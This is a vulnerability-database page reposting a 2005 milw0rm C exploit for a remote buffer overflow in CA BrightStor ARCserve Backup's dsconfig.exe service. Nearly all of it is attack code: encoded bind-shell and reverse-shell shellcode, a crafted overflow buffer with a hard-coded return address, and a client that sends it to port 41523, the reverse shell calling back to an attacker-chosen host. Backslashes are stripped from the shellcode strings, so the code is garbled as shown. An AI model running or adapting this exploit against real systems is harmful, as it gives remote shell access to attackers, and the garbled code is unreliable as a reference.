CA BrightStor ARCserve Backup – ‘dsconfig.exe’ Remote Buffer Overflow
| 漏洞ID | 1055307 | 漏洞类型 | |
| 发布时间 | 2005-08-03 | 更新时间 | 2005-08-03 |
![图片[1]-CA BrightStor ARCserve Backup – ‘dsconfig.exe’ Remote Buffer Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-CA BrightStor ARCserve Backup – ‘dsconfig.exe’ Remote Buffer Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* CA BrightStor ARCserve Backup Buffer Overflow - dsconfig.exe
*
* cybertronic[at]gmx[dot]net
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 41523
unsigned char bindshell[] =
"xebx19x5ex31xc9x81xe9x89xffxffxffx81x36x80xbfx32"
"x94x81xeexfcxffxffxffxe2xf2xebx05xe8xe2xffxffxff"
"x03x53x06x1fx74x57x75x95x80xbfxbbx92x7fx89x5ax1a"
"xcexb1xdex7cxe1xbex32x94x09xf9x3ax6bxb6xd7x9fx4d"
"x85x71xdaxc6x81xbfx32x1dxc6xb3x5axf8xecxbfx32xfc"
"xb3x8dx1cxf0xe8xc8x41xa6xdfxebxcdxc2x88x36x74x90"
"x7fx89x5axe6x7ex0cx24x7cxadxbex32x94x09xf9x22x6b"
"xb6xd7x4cx4cx62xccxdax8ax81xbfx32x1dxc6xabxcdxe2"
"x84xd7xf9x79x7cx84xdax9ax81xbfx32x1dxc6xa7xcdxe2"
"x84xd7xebx9dx75x12xdax6ax80xbfx32x1dxc6xa3xcdxe2"
"x84xd7x96x8exf0x78xdax7ax80xbfx32x1dxc6x9fxcdxe2"
"x84xd7x96x39xaex56xdax4ax80xbfx32x1dxc6x9bxcdxe2"
"x84xd7xd7xddx06xf6xdax5ax80xbfx32x1dxc6x97xcdxe2"
"x84xd7xd5xedx46xc6xdax2ax80xbfx32x1dxc6x93x01x6b"
"x01x53xa2x95x80xbfx66xfcx81xbex32x94x7fxe9x2axc4"
"xd0xefx62xd4xd0xffx62x6bxd6xa3xb9x4cxd7xe8x5ax96"
"x80xaex6ex1fx4cxd5x24xc5xd3x40x64xb4xd7xecxcdxc2"
"xa4xe8x63xc7x7fxe9x1ax1fx50xd7x57xecxe5xbfx5axf7"
"xedxdbx1cx1dxe6x8fxb1x78xd4x32x0exb0xb3x7fx01x5d"
"x03x7ex27x3fx62x42xf4xd0xa4xafx76x6axc4x9bx0fx1d"
"xd4x9bx7ax1dxd4x9bx7ex1dxd4x9bx62x19xc4x9bx22xc0"
"xd0xeex63xc5xeaxbex63xc5x7fxc9x02xc5x7fxe9x22x1f"
"x4cxd5xcdx6bxb1x40x64x98x0bx77x65x6bxd6x93xcdxc2"
"x94xeax64xf0x21x8fx32x94x80x3axf2xecx8cx34x72x98"
"x0bxcfx2ex39x0bxd7x3ax7fx89x34x72xa0x0bx17x8ax94"
"x80xbfxb9x51xdexe2xf0x90x80xecx67xc2xd7x34x5exb0"
"x98x34x77xa8x0bxebx37xecx83x6axb9xdex98x34x68xb4"
"x83x62xd1xa6xc9x34x06x1fx83x4ax01x6bx7cx8cxf2x38"
"xbax7bx46x93x41x70x3fx97x78x54xc0xafxfcx9bx26xe1"
"x61x34x68xb0x83x62x54x1fx8cxf4xb9xcex9cxbcxefx1f"
"x84x34x31x51x6bxbdx01x54x0bx6ax6dxcaxddxe4xf0x90"
"x80x2fxa2x04";
unsigned char reverseshell[] =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFFx70x62x99x99x99xC6xFDx38xA9"
"x99x99x99x12xD9x95x12xE9x85x34x12xF1x91x12x6ExF3"
"x9DxC0x71x02x99x99x99x7Bx60xF1xAAxABx99x99xF1xEE"
"xEAxABxC6xCDx66x8Fx12x71xF3x9DxC0x71x1Bx99x99x99"
"x7Bx60x18x75x09x98x99x99xCDxF1x98x98x99x99x66xCF"
"x89xC9xC9xC9xC9xD9xC9xD9xC9x66xCFx8Dx12x41xF1xE6"
"x99x99x98xF1x9Bx99x9Dx4Bx12x55xF3x89xC8xCAx66xCF"
"x81x1Cx59xECxD3xF1xFAxF4xFDx99x10xFFxA9x1Ax75xCD"
"x14xA5xBDxF3x8CxC0x32x7Bx64x5FxDDxBDx89xDDx67xDD"
"xBDxA4x10xC5xBDxD1x10xC5xBDxD5x10xC5xBDxC9x14xDD"
"xBDx89xCDxC9xC8xC8xC8xF3x98xC8xC8x66xEFxA9xC8x66"
"xCFx9Dx12x55xF3x66x66xA8x66xCFx91xCAx66xCFx85x66"
"xCFx95xC8xCFx12xDCxA5x12xCDxB1xE1x9Ax4CxCBx12xEB"
"xB9x9Ax6CxAAx50xD0xD8x34x9Ax5CxAAx42x96x27x89xA3"
"x4FxEDx91x58x52x94x9Ax43xD9x72x68xA2x86xECx7ExC3"
"x12xC3xBDx9Ax44xFFx12x95xD2x12xC3x85x9Ax44x12x9D"
"x12x9Ax5Cx32xC7xC0x5Ax71x99x66x66x66x17xD7x97x75"
"xEBx67x2Ax8Fx34x40x9Cx57x76x57x79xF9x52x74x65xA2"
"x40x90x6Cx34x75x60x33xF9x7ExE0x5FxE0";
void
exploit ( int s, unsigned long cbip, unsigned short cbport, int option )
{
char buffer[4129];
unsigned long poppopret = 0x23805714;
bzero ( &buffer, sizeof ( buffer ) );
memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
buffer[0] = 0x9b;
buffer[1] = 0x53; //S
buffer[2] = 0x45; //E
buffer[3] = 0x52; //R
buffer[4] = 0x56; //V
buffer[5] = 0x49; //I
buffer[6] = 0x43; //C
buffer[7] = 0x45; //E
buffer[8] = 0x50; //P
buffer[9] = 0x43; //C
buffer[10] = 0x18;
buffer[11] = 0x01;
buffer[12] = 0x02;
buffer[13] = 0x03;
buffer[14] = 0x04;
buffer[15] = 0x53; //S
buffer[16] = 0x45; //E
buffer[17] = 0x52; //R
buffer[18] = 0x56; //V
buffer[19] = 0x49; //I
buffer[20] = 0x43; //C
buffer[21] = 0x45; //E
buffer[22] = 0x50; //P
buffer[23] = 0x43; //C
buffer[24] = 0x01;
buffer[25] = 0x0c;
buffer[26] = 0x6c;
buffer[27] = 0x93;
buffer[28] = 0xce;
buffer[29] = 0x18;
buffer[30] = 0x18;
memcpy ( buffer + 1056, "xebx06", 2 );
memcpy ( buffer + 1060, "x14x57x80x23", 4 );
if ( option == 0 )
{
memcpy ( &reverseshell[111], &cbip, 4);
memcpy ( &reverseshell[118], &cbport, 2);
memcpy ( buffer + 1064, reverseshell, sizeof ( reverseshell ) - 1 );
}
else
memcpy ( buffer + 1064, bindshell, sizeof ( bindshell ) - 1 );
printf ( "attacking with %u bytes...", strlen ( buffer ) );
write ( s, buffer, strlen ( buffer ) );
printf ( "done!n" );
close ( s );
}
int
main ( int argc, char* argv[] )
{
int s;
unsigned long cbip;
unsigned short cbport;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( argc != 2 )
if ( argc != 4 )
{ fprintf ( stderr, "Usagen-----n[bindshell] %s <ip>n[reverseshell] %s <ip> <cbip> <cbport>n", argv[0], argv[0] ); exit ( 1 ); }
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
{ fprintf ( stderr, "Cannot resolve hostname: %sn", argv[1] ); exit ( 1 ); }
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT );
s = socket ( AF_INET, SOCK_STREAM, 0 );
printf ( "connecting to %s:%u...", argv[1], PORT );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{ printf ( "failed!n" ); exit ( 1 ); }
printf ( "ok!n" );
if ( argc == 4 )
{
cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
exploit ( s, cbip, cbport, 0 );
}
else
exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
}
// milw0rm.com [2005-08-03]相关推荐: AIX chlang Insecure Temporary File Creation Vulnerability
AIX chlang Insecure Temporary File Creation Vulnerability 漏洞ID 1104926 漏洞类型 Origin Validation Error 发布时间 1998-06-30 更新时间 1998-06-3…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666